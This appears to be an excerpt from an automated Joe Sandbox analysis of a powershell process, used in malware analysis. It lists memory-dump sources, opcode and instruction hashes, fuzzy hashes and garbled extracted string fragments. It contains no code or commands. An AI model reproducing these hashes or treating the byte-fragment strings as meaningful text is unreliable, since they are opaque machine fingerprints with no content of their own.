                                                                                                                                        • Instruction Fuzzy Hash: FF014C6240E3C09FE7128B259C94B56BFB4DF53224F1980DBED898F1A3C2695849CB72
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036454018.0000000004AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AFD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4afd000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 452b2b3e33b5dbe7d41b701116278b1f3f6cb7da14c2486bcd735c8b852fbcd1
                                                                                                                                        • Instruction ID: c28e25ef47f2471bfba1cb0aaa21c15b6ffda582c13e5eb12e86a4752c49ca55
                                                                                                                                        • Opcode Fuzzy Hash: 452b2b3e33b5dbe7d41b701116278b1f3f6cb7da14c2486bcd735c8b852fbcd1
                                                                                                                                        • Instruction Fuzzy Hash: 9701F7715043409AF7214F55EC84B66BFE8DF51325F08C42AFE0B0B242C779A842CAB1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2519e32f87471ed858bec8786f61ce3f17f88f21ba60e080f37d03f73ec2421e
                                                                                                                                        • Instruction ID: df527e63c92edc0d4ef61438d1a2b2338e37b5d32f091ea1e706f422e95aed25
                                                                                                                                        • Opcode Fuzzy Hash: 2519e32f87471ed858bec8786f61ce3f17f88f21ba60e080f37d03f73ec2421e
                                                                                                                                        • Instruction Fuzzy Hash: 4DF0BB367002004BEF147B69A444B6E77B7FBC9226B54453DE94FC7344DF71684643A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bcd79b9db6d5a23d2071e53c842e29d9d6cd7b6005eaa18c4da2b5251e56295c
                                                                                                                                        • Instruction ID: c9340748ac09b2ac5e8490975484a1407f61bde8af649644f90cd34c77d0c58f
                                                                                                                                        • Opcode Fuzzy Hash: bcd79b9db6d5a23d2071e53c842e29d9d6cd7b6005eaa18c4da2b5251e56295c
                                                                                                                                        • Instruction Fuzzy Hash: FDF054393207108F8B0A7B68A46847D7BE7EFC9662314801EE907C7345CF74EC028795
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4c7f4fea8faf4f4f0f9eca8149e6d50bc51130b5324389bb89f943f1a023587a
                                                                                                                                        • Instruction ID: cf44c0fd35c09c62673e8a921cd6c329c2dd9130309e28f538752c1ad91de421
                                                                                                                                        • Opcode Fuzzy Hash: 4c7f4fea8faf4f4f0f9eca8149e6d50bc51130b5324389bb89f943f1a023587a
                                                                                                                                        • Instruction Fuzzy Hash: 26F0B430B096514FDB0E6BB964581AD7F63EFC6225F0500BEE40ACB252DF390806C3D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 21d92fe50c5f183c985ea794d79a79b9aec9989d1daa19358b7d5db9ed137416
                                                                                                                                        • Instruction ID: 34df922628dbd26e5c20f0262fdb6db9c20992f76a2f8f26854d370f6ffc462e
                                                                                                                                        • Opcode Fuzzy Hash: 21d92fe50c5f183c985ea794d79a79b9aec9989d1daa19358b7d5db9ed137416
                                                                                                                                        • Instruction Fuzzy Hash: 1BF02E327092504FD71127ACA85457D7F77FBCA121719416FD44FCB352CE5158064361
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ccceaf66e6ba5bbc3368870be207130c5b6709f82e6685bafbfcd1ac16e0936b
                                                                                                                                        • Instruction ID: 03978453b9c8392b6585b4a17db15aa46675d46800a125bf7fae2be97394db6b
                                                                                                                                        • Opcode Fuzzy Hash: ccceaf66e6ba5bbc3368870be207130c5b6709f82e6685bafbfcd1ac16e0936b
                                                                                                                                        • Instruction Fuzzy Hash: 7FE09B71D042476FC751EF6C8C4185EFFF19B04214B2885A9D856DB396FB31A51387E0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 22afec83f6b4288d4cb35a1aa107066f3029abc4db608e2e1f6ca5312062f227
                                                                                                                                        • Instruction ID: 3ef03bb3a232cd16dc904a56fc81e02bb629f326692d69faed0f2c1b0a88d727
                                                                                                                                        • Opcode Fuzzy Hash: 22afec83f6b4288d4cb35a1aa107066f3029abc4db608e2e1f6ca5312062f227
                                                                                                                                        • Instruction Fuzzy Hash: 1BE026313082104BDF0D37B5A80C29E7B5BEBC4729F04003DE40A83341CF78280283D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bd6b2fd4a416e6c8920ccc08b5bf7659ed01fa0ebf883e2e3ae262a379348ccd
                                                                                                                                        • Instruction ID: dcc27c57dab41a8ff1e5125a1fbf4cd4bf24e019a7e75cd0985f657b505e48ce
                                                                                                                                        • Opcode Fuzzy Hash: bd6b2fd4a416e6c8920ccc08b5bf7659ed01fa0ebf883e2e3ae262a379348ccd
                                                                                                                                        • Instruction Fuzzy Hash: B0E0923190A149CFCB09FBA4E4A68FC7F70FA01210B5101ADD90756593DA20004ECBC1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                        • Instruction ID: b321872af1c157fb2ce09cc9dd27f169bfc22b5def20190abb96fade26cb6428
                                                                                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                        • Instruction Fuzzy Hash: 56D067B1D042099F8780EFADC94166EFBF5EB48210F6485AAC919E7301F7329A12CBD1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3837a3abc4b177ba4818661d0daf25f17cee124bb06be210bc7e266dcc828525
                                                                                                                                        • Instruction ID: 5d498fa839dbdafbce5427899a1d9037c7a26fca358393f14e73bce17a43a103
                                                                                                                                        • Opcode Fuzzy Hash: 3837a3abc4b177ba4818661d0daf25f17cee124bb06be210bc7e266dcc828525
                                                                                                                                        • Instruction Fuzzy Hash: 3BD01731D0920E8BCB48BFA4E86A8BDBB74FB00201F80406DDA0752581AA202906CFC1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 53767e7926512543f2561dc85e43e8343dcbe44f72eadd3d755852f6f3b41135
                                                                                                                                        • Instruction ID: 9e7b1cb77512cdafb5f7472d8bc11d593afb6bc085db48da527fdc6cd1ad86f0
                                                                                                                                        • Opcode Fuzzy Hash: 53767e7926512543f2561dc85e43e8343dcbe44f72eadd3d755852f6f3b41135
                                                                                                                                        • Instruction Fuzzy Hash: 9FD01731F082098F8B88EFA4E45A86EBBB5EB48205F004168EA0A93340EA306841CBD1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 92861a4b98e9cec33d9b4d0bd2c83577930f34014af7d2bebaf13f1347d910de
                                                                                                                                        • Instruction ID: 58286f0063cff31045b93622e11cf73aa5cf6f918927bf24c84556b409d33c1f
                                                                                                                                        • Opcode Fuzzy Hash: 92861a4b98e9cec33d9b4d0bd2c83577930f34014af7d2bebaf13f1347d910de
                                                                                                                                        • Instruction Fuzzy Hash: 87A001782411009BD644EB54C992814B762AB85619B28C499A9198F296DB63E913DA40
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ,Swl$,Swl$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$d5gk$xSwl
                                                                                                                                        • API String ID: 0-1289337953
                                                                                                                                        • Opcode ID: d62ed8e3dc28958ec82d7276dde3e99a99d0acf67e1ade2e1845595575cdbd0f
                                                                                                                                        • Instruction ID: 3f661a4288f9434cae352fed9b7514f2c873757f51f68831ffd5c30f32b7394c
                                                                                                                                        • Opcode Fuzzy Hash: d62ed8e3dc28958ec82d7276dde3e99a99d0acf67e1ade2e1845595575cdbd0f
                                                                                                                                        • Instruction Fuzzy Hash: 3BE12CF1B053258FEB149B68844466ABBE2EF86311F18C0FAD40DEF255DB31E846D7A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$ml$ml
                                                                                                                                        • API String ID: 0-3151627902
                                                                                                                                        • Opcode ID: 204f6a1c69dd379badc4a1ea3abe18e84bc47bca294b5cd64ec66a7bd6229b90
                                                                                                                                        • Instruction ID: cb88d9929a804f763e6392f3762b53e7843a31c0443bb3010b95c0da871d4133
                                                                                                                                        • Opcode Fuzzy Hash: 204f6a1c69dd379badc4a1ea3abe18e84bc47bca294b5cd64ec66a7bd6229b90
                                                                                                                                        • Instruction Fuzzy Hash: 71B159F17053268FEB248A798801767BBE1EFC6311F1484EAE649CF291CE31D846D7A5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-1823345594
                                                                                                                                        • Opcode ID: b0c8b11d20330d07af5f51f7811a2b78e1a6280effd3beec68ec2a6bbf54a2a3
                                                                                                                                        • Instruction ID: 6a3725d2984be58ae3d02569aaa691a62b17fbb82d63fab5e7cf63ef51a257e9
                                                                                                                                        • Opcode Fuzzy Hash: b0c8b11d20330d07af5f51f7811a2b78e1a6280effd3beec68ec2a6bbf54a2a3
                                                                                                                                        • Instruction Fuzzy Hash: 25F127F1B1522A8FEB258A28C4116ABBBE1EF85311F1484EAD45DCF251EF31C887D791
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_9410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 84ul$84ul$84ul$84ul$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-3429795021
                                                                                                                                        • Opcode ID: d95957bde5e63a42b707db4f6939fbfaaf59513b86800402cbba46e5091d2282
                                                                                                                                        • Instruction ID: 3a91a3dce2e2f6dc2b6f841a5af1775068eda1a8d22543a7f3ba3b75ac7d6440
                                                                                                                                        • Opcode Fuzzy Hash: d95957bde5e63a42b707db4f6939fbfaaf59513b86800402cbba46e5091d2282
                                                                                                                                        • Instruction Fuzzy Hash: FFD1C531B002189FCB259F68C85176BBBE2EF88351F14846BE915DB390DBB2DD46C7A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$84ul$84ul$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                                                                        • API String ID: 0-1179358571
                                                                                                                                        • Opcode ID: 81a5dad63fc0eb12ad9a24bdc7908ee11f0320d4e890604cc291f5b0f8482d24
                                                                                                                                        • Instruction ID: bea5f949fb3b1c099aa5c1d86817634a577ae6180e71a4d21b72487e7eda0a00
                                                                                                                                        • Opcode Fuzzy Hash: 81a5dad63fc0eb12ad9a24bdc7908ee11f0320d4e890604cc291f5b0f8482d24
                                                                                                                                        • Instruction Fuzzy Hash: 2371C7F0A02225DFEB24CF16C54CBAAB7E2EF45311F2984D6E8096B291C631ED42DB51
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$84ul$84ul$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                                                                        • API String ID: 0-1179358571
                                                                                                                                        • Opcode ID: b49d695afaf6c76069fc99fbc25b559cf673450904fdd14a7e6852ca934b9e01
                                                                                                                                        • Instruction ID: fdebf52612c25ae1e499a589aa63adbc3e348374b4f559869993d657f81887f8
                                                                                                                                        • Opcode Fuzzy Hash: b49d695afaf6c76069fc99fbc25b559cf673450904fdd14a7e6852ca934b9e01
                                                                                                                                        • Instruction Fuzzy Hash: ED61C7F0A022259FEB24CF56C54CBAAB7E2FF45311F2984D6E8095B291C731ED42DB91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$84ul$84ul$tP^q$tP^q$$^q$$^q
                                                                                                                                        • API String ID: 0-182408052
                                                                                                                                        • Opcode ID: 18fbf1bd123b12ab532bf5201f3f384ef3753697a296e606bd7334e564dcf6f8
                                                                                                                                        • Instruction ID: a8e55b1ca4968afa8fecc974a11b09313c48b18e44779b3bae6338ea67710618
                                                                                                                                        • Opcode Fuzzy Hash: 18fbf1bd123b12ab532bf5201f3f384ef3753697a296e606bd7334e564dcf6f8
                                                                                                                                        • Instruction Fuzzy Hash: E661F5F1B012299FEB148E54C8457BA77B2FF89352F648499ED095F284CB31DC42DBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$84ul$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-3752238523
                                                                                                                                        • Opcode ID: 507f8f12bde47646d62ef758fa374626083d9f6cb57d8bc439cf021512026959
                                                                                                                                        • Instruction ID: 86a074273b0c3e1edabde01e13a61f0b8a02593c7b56cc6931d65c923f49401e
                                                                                                                                        • Opcode Fuzzy Hash: 507f8f12bde47646d62ef758fa374626083d9f6cb57d8bc439cf021512026959
                                                                                                                                        • Instruction Fuzzy Hash: 6151D2F0612226DFEB258E06C50C77677A2FF45311F1484E9E8089F2A0DB31DC86EBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$84ul$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-3752238523
                                                                                                                                        • Opcode ID: 5c12481c77b705d53fece99c5f5ae591735932a5a5f6abc593ec67c8eab23356
                                                                                                                                        • Instruction ID: 5fa5ca753f861fb6675197c670a806f82c2edbcb485b765bfe43e037347f3596
                                                                                                                                        • Opcode Fuzzy Hash: 5c12481c77b705d53fece99c5f5ae591735932a5a5f6abc593ec67c8eab23356
                                                                                                                                        • Instruction Fuzzy Hash: 4051C1F0612226DBFB258E06C50C77677A1FB45311F5884E9E80D9F2A0DB75DC82EBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$ml$ml
                                                                                                                                        • API String ID: 0-1644293777
                                                                                                                                        • Opcode ID: 07fc882cdf79c8c8287021a1324ee99dcfebc2a31d930ac7538287cc73922706
                                                                                                                                        • Instruction ID: a7061c82be0c43a707bcd268143d7d2e28aa5e6e66d869b49ec049ecdb9af055
                                                                                                                                        • Opcode Fuzzy Hash: 07fc882cdf79c8c8287021a1324ee99dcfebc2a31d930ac7538287cc73922706
                                                                                                                                        • Instruction Fuzzy Hash: B35168F170222A9FEF259A29C401366BBF2EFC5219F1484EAD44DCBA41DA32C853D791
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$84ul$d%dq$d%dq$d%dq$tP^q$$^q
                                                                                                                                        • API String ID: 0-479564272
                                                                                                                                        • Opcode ID: b0cb76b6cd125e65ac442dde40362ff007b4dc11e0735880b805885c7c007f4b
                                                                                                                                        • Instruction ID: b2b7881af2cc9ba7ee0bae339fed0ed14da2430b7153e0b1c4e2290347e8586f
                                                                                                                                        • Opcode Fuzzy Hash: b0cb76b6cd125e65ac442dde40362ff007b4dc11e0735880b805885c7c007f4b
                                                                                                                                        • Instruction Fuzzy Hash: E25167F0A01225CFEB258F16C549A7ABBA2EF45741F0880DAD8099F291CB31DD43DBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$x.hk$-hk
                                                                                                                                        • API String ID: 0-70303282
                                                                                                                                        • Opcode ID: ddd39b098e725b0fdd0cd8f831fc219d61fe4cd198ed2944fa12adbd5d489d2d
                                                                                                                                        • Instruction ID: 33b85f5a9e60a62d85cdceb80b0b07db43e771463c4cdca6c07b9ce907237654
                                                                                                                                        • Opcode Fuzzy Hash: ddd39b098e725b0fdd0cd8f831fc219d61fe4cd198ed2944fa12adbd5d489d2d
                                                                                                                                        • Instruction Fuzzy Hash: 4A125DF0A00229DFDB24DF14C950BAABBB2FB85304F1085E5D9096B391DB72AD85CF91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$84ul$tP^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-109380643
                                                                                                                                        • Opcode ID: 0b4d0ea7c3cd61fc01f3bd5de9eddb4c191aa301977ab83ce00e83e346c5cf4f
                                                                                                                                        • Instruction ID: 3cdbe483f0fb0b60b2dc60f814c6e1aa8fa44142dc3ce2032e8ba3fb19f0b522
                                                                                                                                        • Opcode Fuzzy Hash: 0b4d0ea7c3cd61fc01f3bd5de9eddb4c191aa301977ab83ce00e83e346c5cf4f
                                                                                                                                        • Instruction Fuzzy Hash: 3B71F5F470222ADFFB248E15C544BBA77B2EF46312F5484E6E8095B294C731DD82EB91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$84ul$tP^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-109380643
                                                                                                                                        • Opcode ID: 9ddad647af488ca93c22d78ede753c3d9572100589a30ff3404161e42d2d9a2b
                                                                                                                                        • Instruction ID: 34218799358ed6e2ab49dd8e5a170c09baec61e856d9526e37702652d8e1a424
                                                                                                                                        • Opcode Fuzzy Hash: 9ddad647af488ca93c22d78ede753c3d9572100589a30ff3404161e42d2d9a2b
                                                                                                                                        • Instruction Fuzzy Hash: C161D4F470222ADFFB248E15C544BBA77B2EF46352F9484D5E8095B294C731DC82EB91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                                                                                        • API String ID: 0-1041444323
                                                                                                                                        • Opcode ID: 805463c11280edae8d8fa24ac7188a075984c71314c3250a5727fa7d7a039faa
                                                                                                                                        • Instruction ID: 512f09ba88400cffa32757701b20df649cc105d969b941d140bd9b075d1f4b97
                                                                                                                                        • Opcode Fuzzy Hash: 805463c11280edae8d8fa24ac7188a075984c71314c3250a5727fa7d7a039faa
                                                                                                                                        • Instruction Fuzzy Hash: E9216EF1B0D3264FE729262818252756BE29FC5651B2945EBC449CF346CE215C474397
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$84ul$d%dq$d%dq$d%dq$tP^q
                                                                                                                                        • API String ID: 0-2431970000
                                                                                                                                        • Opcode ID: a6d81644a52c5c1725223d066a243ce72b2a09e8bbfd15a35660d1e82797c8c2
                                                                                                                                        • Instruction ID: f0f077513747cd4b01fdf802eaab4b1bc02280da887eb9a13469698b8966bb4e
                                                                                                                                        • Opcode Fuzzy Hash: a6d81644a52c5c1725223d066a243ce72b2a09e8bbfd15a35660d1e82797c8c2
                                                                                                                                        • Instruction Fuzzy Hash: 8531D3F0B012259FEB28CF55C448A69B7E2FF89710F248499E90A6B350C731DD42CBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-3272787073
                                                                                                                                        • Opcode ID: 6b68732914e2d722bdde4739f4ef585a77fd928307ea4b310f2d893183f70339
                                                                                                                                        • Instruction ID: b70072fa0ac935af16fa5fad9672dc3724ccf6c62cbfc9304c24c3ee72c3a137
                                                                                                                                        • Opcode Fuzzy Hash: 6b68732914e2d722bdde4739f4ef585a77fd928307ea4b310f2d893183f70339
                                                                                                                                        • Instruction Fuzzy Hash: 4A4148F1B1622ADFEF266B24881067A7BB1EFC1201F1444EAD809CB251DF31C946D7A2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
